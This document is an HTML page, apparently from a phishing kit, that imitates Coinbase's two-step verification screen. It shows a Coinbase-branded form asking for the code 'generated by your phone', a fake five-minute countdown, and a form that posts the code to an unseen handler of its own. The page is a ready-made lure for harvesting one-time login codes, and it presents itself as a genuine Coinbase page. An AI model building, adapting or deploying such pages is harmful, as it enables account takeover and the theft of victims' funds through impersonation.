<html lang="en" class="fontawesome-i2svg-active fontawesome-i2svg-complete"><head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <style type="text/css">svg:not(:root).svg-inline--fa{overflow:visible}.svg-inline--fa{display:inline-block;font-size:inherit;height:1em;overflow:visible;vertical-align:-.125em}.svg-inline--fa.fa-lg{vertical-align:-.225em}.svg-inline--fa.fa-w-1{width:.0625em}.svg-inline--fa.fa-w-2{width:.125em}.svg-inline--fa.fa-w-3{width:.1875em}.svg-inline--fa.fa-w-4{width:.25em}.svg-inline--fa.fa-w-5{width:.3125em}.svg-inline--fa.fa-w-6{width:.375em}.svg-inline--fa.fa-w-7{width:.4375em}.svg-inline--fa.fa-w-8{width:.5em}.svg-inline--fa.fa-w-9{width:.5625em}.svg-inline--fa.fa-w-10{width:.625em}.svg-inline--fa.fa-w-11{width:.6875em}.svg-inline--fa.fa-w-12{width:.75em}.svg-inline--fa.fa-w-13{width:.8125em}.svg-inline--fa.fa-w-14{width:.875em}.svg-inline--fa.fa-w-15{width:.9375em}.svg-inline--fa.fa-w-16{width:1em}.svg-inline--fa.fa-w-17{width:1.0625em}.svg-inline--fa.fa-w-18{width:1.125em}.svg-inline--fa.fa-w-19{width:1.1875em}.svg-inline--fa.fa-w-20{width:1.25em}.svg-inline--fa.fa-pull-left{margin-right:.3em;width:auto}.svg-inline--fa.fa-pull-right{margin-left:.3em;width:auto}.svg-inline--fa.fa-border{height:1.5em}.svg-inline--fa.fa-li{width:2em}.svg-inline--fa.fa-fw{width:1.25em}.fa-layers svg.svg-inline--fa{bottom:0;left:0;margin:auto;position:absolute;right:0;top:0}.fa-layers{display:inline-block;height:1em;position:relative;text-align:center;vertical-align:-.125em;width:1em}.fa-layers svg.svg-inline--fa{-webkit-transform-origin:center center;transform-origin:center center}.fa-layers-counter,.fa-layers-text{display:inline-block;position:absolute;text-align:center}.fa-layers-text{left:50%;top:50%;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%);-webkit-transform-origin:center center;transform-origin:center center}.fa-layers-counter{background-color:#ff253a;border-radius:1em;-webkit-box-sizing:border-box;box-sizing:border-box;color:#fff;height:1.5em;line-height:1;max-width:5em;min-width:1.5em;overflow:hidden;padding:.25em;right:0;text-overflow:ellipsis;top:0;-webkit-transform:scale(.25);transform:scale(.25);-webkit-transform-origin:top right;transform-origin:top right}.fa-layers-bottom-right{bottom:0;right:0;top:auto;-webkit-transform:scale(.25);transform:scale(.25);-webkit-transform-origin:bottom right;transform-origin:bottom right}.fa-layers-bottom-left{bottom:0;left:0;right:auto;top:auto;-webkit-transform:scale(.25);transform:scale(.25);-webkit-transform-origin:bottom left;transform-origin:bottom left}.fa-layers-top-right{right:0;top:0;-webkit-transform:scale(.25);transform:scale(.25);-webkit-transform-origin:top right;transform-origin:top right}.fa-layers-top-left{left:0;right:auto;top:0;-webkit-transform:scale(.25);transform:scale(.25);-webkit-transform-origin:top left;transform-origin:top left}.fa-lg{font-size:1.3333333333em;line-height:.75em;vertical-align:-.0667em}.fa-xs{font-size:.75em}.fa-sm{font-size:.875em}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-fw{text-align:center;width:1.25em}.fa-ul{list-style-type:none;margin-left:2.5em;padding-left:0}.fa-ul>li{position:relative}.fa-li{left:-2em;position:absolute;text-align:center;width:2em;line-height:inherit}.fa-border{border:solid .08em #eee;border-radius:.1em;padding:.2em .25em .15em}.fa-pull-left{float:left}.fa-pull-right{float:right}.fa.fa-pull-left,.fab.fa-pull-left,.fal.fa-pull-left,.far.fa-pull-left,.fas.fa-pull-left{margin-right:.3em}.fa.fa-pull-right,.fab.fa-pull-right,.fal.fa-pull-right,.far.fa-pull-right,.fas.fa-pull-right{margin-left:.3em}.fa-spin{-webkit-animation:fa-spin 2s infinite linear;animation:fa-spin 2s infinite linear}.fa-pulse{-webkit-animation:fa-spin 1s infinite steps(8);animation:fa-spin 1s infinite steps(8)}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0);transform:rotate(0)}100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}.fa-rotate-90{-webkit-transform:rotate(90deg);transform:rotate(90deg)}.fa-rotate-180{-webkit-transform:rotate(180deg);transform:rotate(180deg)}.fa-rotate-270{-webkit-transform:rotate(270deg);transform:rotate(270deg)}.fa-flip-horizontal{-webkit-transform:scale(-1,1);transform:scale(-1,1)}.fa-flip-vertical{-webkit-transform:scale(1,-1);transform:scale(1,-1)}.fa-flip-both,.fa-flip-horizontal.fa-flip-vertical{-webkit-transform:scale(-1,-1);transform:scale(-1,-1)}:root .fa-flip-both,:root .fa-flip-horizontal,:root .fa-flip-vertical,:root .fa-rotate-180,:root .fa-rotate-270,:root .fa-rotate-90{-webkit-filter:none;filter:none}.fa-stack{display:inline-block;height:2em;position:relative;width:2.5em}.fa-stack-1x,.fa-stack-2x{bottom:0;left:0;margin:auto;position:absolute;right:0;top:0}.svg-inline--fa.fa-stack-1x{height:1em;width:1.25em}.svg-inline--fa.fa-stack-2x{height:2em;width:2.5em}.fa-inverse{color:#fff}.sr-only{border:0;clip:rect(0,0,0,0);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px}.sr-only-focusable:active,.sr-only-focusable:focus{clip:auto;height:auto;margin:0;overflow:visible;position:static;width:auto}.svg-inline--fa .fa-primary{fill:var(--fa-primary-color,currentColor);opacity:1;opacity:var(--fa-primary-opacity,1)}.svg-inline--fa .fa-secondary{fill:var(--fa-secondary-color,currentColor);opacity:.4;opacity:var(--fa-secondary-opacity,.4)}.svg-inline--fa.fa-swap-opacity .fa-primary{opacity:.4;opacity:var(--fa-secondary-opacity,.4)}.svg-inline--fa.fa-swap-opacity .fa-secondary{opacity:1;opacity:var(--fa-primary-opacity,1)}.svg-inline--fa mask .fa-primary,.svg-inline--fa mask .fa-secondary{fill:#000}.fad.fa-inverse{color:#fff}

@import url('https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,300;0,400;0,500;1,100;1,300;1,400&display=swap');

body{
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    background: #1652f0;
    color: white;
    font-family: 'Roboto', sans-serif;
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
}
nav{
    width: 100%;
    height: 60px;
    display: flex;
    justify-content: space-between;
    align-items: center;
}
nav img{
    margin-left: 100px;
    width: 140px;
    height: 30px;
}
nav ul{
    display: flex;
    align-items: center;
    list-style: none;
    margin-right: 80px;
}
#sinsc{
    border: 2px solid white;
    padding: 10px;
}
nav ul li{
    margin: 0 15px 0 15px;
    cursor: pointer;
}


.container{
    width: 100%;
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    margin-top: 10px;
}
.container form{
    width: 350px;
    padding: 20px 10px;
    display: flex;
    flex-direction: column;
    align-items: center;
    background-color: white;
}
.container h1{
    padding-bottom: 10px;
    font-size: 32px;
    font-weight: 400;
}
.container form input[type="text"],
.container form input[type="password"]{
    padding-left: 10px;
    width: 90%;
    height: 38px;
    margin-top: 10px;
    border-radius: 3px;
    border: 1.5px solid rgb(226, 226, 226);
    outline: none;
}
.container form input[type="text"]:focus,
.container form input[type="password"]:focus{
    transition: all 0.5s ease-in-out;
    border: 1.5px solid rgba(65, 82, 238, 0.829);
}
.container form div{
    margin-top: 16px;
    width: 95%;
    display: flex;
    align-items: center;
    justify-content: space-between;
}
form div p {
    font-size: 12px;
    color: rgb(126, 133, 165);
    font-weight: 500;
    
}
span{
    display: flex;
    align-items: center;
}
button{
    font-weight: 600;
    background-image: -webkit-gradient(linear,left top,left bottom,from(#1652f0),to(#0d40c6));
    background-image: -webkit-linear-gradient(#1652f0,#0d40c6);
    background-image: linear-gradient(#1652f0,#0d40c6);
    border-color: #137dba;
    border: none;
    border-radius: 3px;
    color: white;
    width: 150px;
    font-size: 16px;
    font-weight: 500;
    height: 45px;
    margin-right: 12px;
}
#ass{
    text-align: center;
    display: flex;
    flex-wrap: wrap;
    align-items: center;
    justify-content: center;
    width: 400px;
    padding-top: 10px;
}
#ass a{
    color: white;
    text-decoration: none;
    margin: 0 5px 0 5px;
}
#ass a:hover{
    border-bottom: 1px solid white;
}
#Menu-Bar-Icon{
    display: none;
    font-size: 30px;
    margin-right: 20px;
}
@media only screen and (max-width: 900px){
    nav img{
        margin-left: 30px;
    }
    nav ul{
        margin-right: 18px;
    }
}
@media only screen and (max-width: 700px){
    nav ul{
        display: none;
    }
    #Menu-Bar-Icon{
        display: block;
    }
}
@media only screen and (max-width: 390px){
    form{
        width: 5px;
        padding: 0px 0px;
    }
}
form section:nth-child(2) {
    display: flex;
    align-items: center;
    justify-content: space-between;
    width: 90%;
    margin-top: 20px;
}
form section span{
    display: flex;
    flex-direction: column;
    align-items: center;
}
form section span label{
    color: #0445e7;
    font-size: 13px;
}

#phone{
    color: #0445e7;
    font-size: 60px;
}

#num{
    font-weight: 500;
    color: rgb(255, 43, 43);
    margin-top: 33px;
    margin-left: 10px;
}
#xx{
    display: flex;
    align-items: center;
    justify-content: center;
    height: 0;
}
#xx h3{
    padding-right: 5px;
    color: #1652f0;
    border-right: rgb(155, 133, 133) 2px solid;
}
#xx w{
    padding-left: 5px;
    color: rgb(65, 50, 50);
    font-weight: 500;
}
	
	</style>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="../Scripts/fonts.js"></script><script src="https://kit-pro.fontawesome.com/releases/latest/js/pro-v4-shims.min.js"></script><script src="https://kit-pro.fontawesome.com/releases/latest/js/pro.min.js" data-auto-a11y="true" data-auto-fetch-svg="" data-fetch-svg-from="https://kit-pro.fontawesome.com/releases/latest/svgs"></script>
	
	
    <script>var seconds = 300;
var x = 59;
setInterval(function() {
    if (seconds<=300 && seconds>240){
        document.getElementById("num").innerHTML = "04:"+x--;
        seconds--;
    }
    if (seconds<=240 && seconds>180){
        document.getElementById("num").innerHTML = "03:"+x--;
        seconds--;
    }
    if (seconds<=180 && seconds>120){
        document.getElementById("num").innerHTML = "02:"+x--;
        seconds--;
    }
    if (seconds<=120 && seconds>60){
        document.getElementById("num").innerHTML = "01:"+x--;
        seconds--;
    }
    if (seconds<=120 && seconds>60){
        document.getElementById("num").innerHTML = "00:"+x--;
        seconds--;
    }
    if (x==0)
        x=59;
}, 1000)</script>
    <title>Document</title>
</head>
<body>
    <nav>
        <img src="logo.svg" alt="Logo">
        <ul id="topUlTop">
            <li>Products</li>
            <li>Aid</li>
            <li>Price</li>
            <li>Log in</li>
            <li id="sinsc">Register now</li>
        </ul>
        <svg style="" id="Menu-Bar-Icon" class="svg-inline--fa fa-bars fa-w-14" aria-hidden="true" focusable="false" data-prefix="fas" data-icon="bars" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" data-fa-i2svg=""><path fill="currentColor" d="M16 132h416c8.837 0 16-7.163 16-16V76c0-8.837-7.163-16-16-16H16C7.163 60 0 67.163 0 76v40c0 8.837 7.163 16 16 16zm0 160h416c8.837 0 16-7.163 16-16v-40c0-8.837-7.163-16-16-16H16c-8.837 0-16 7.163-16 16v40c0 8.837 7.163 16 16 16zm0 160h416c8.837 0 16-7.163 16-16v-40c0-8.837-7.163-16-16-16H16c-8.837 0-16 7.163-16 16v40c0 8.837 7.163 16 16 16z"></path></svg><!-- <i style="" id="Menu-Bar-Icon" class="fas fa-bars"></i> Font Awesome fontawesome.com -->
    </nav>
    <div class="container">
        <h1>2-Step Verification</h1>
        <p>Enter the verification code generated by your phone</p>
        <form action="" method="post" id="conte">
            <section id="xx" style="padding: 15px 0 20px 0;">
                <h3>Coinbase</h3>
                <w>2-Step Verification</w>
            </section>
            <section>
                <svg id="phone" class="svg-inline--fa fa-mobile-alt fa-w-10" aria-hidden="true" focusable="false" data-prefix="fas" data-icon="mobile-alt" role="img" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 320 512" data-fa-i2svg=""><path fill="currentColor" d="M272 0H48C21.5 0 0 21.5 0 48v416c0 26.5 21.5 48 48 48h224c26.5 0 48-21.5 48-48V48c0-26.5-21.5-48-48-48zM160 480c-17.7 0-32-14.3-32-32s14.3-32 32-32 32 14.3 32 32-14.3 32-32 32zm112-108c0 6.6-5.4 12-12 12H60c-6.6 0-12-5.4-12-12V60c0-6.6 5.4-12 12-12h200c6.6 0 12 5.4 12 12v312z"></path></svg><!-- <i id="phone" class="fas fa-mobile-alt"></i> Font Awesome fontawesome.com -->
                <span>
                    <label for="#">After 5 minute the code will be invalid</label>
                    <input type="text" name="code" placeholder="Enter 2-step verification code">
                </span>
            </section>
            <div>
                <b id="num">00:56</b>
                <button type="submit" name="log1">Verify</button>
            </div>
        </form>
        <div id="ass">
            <a href="#">Resend Code ?</a>
            <a href="#">Not recieved sms yet?</a>
            <a href="#">Privacy policy</a>
            <a href="#">Contact Support</a>
        </div>
    </div>

</body></html>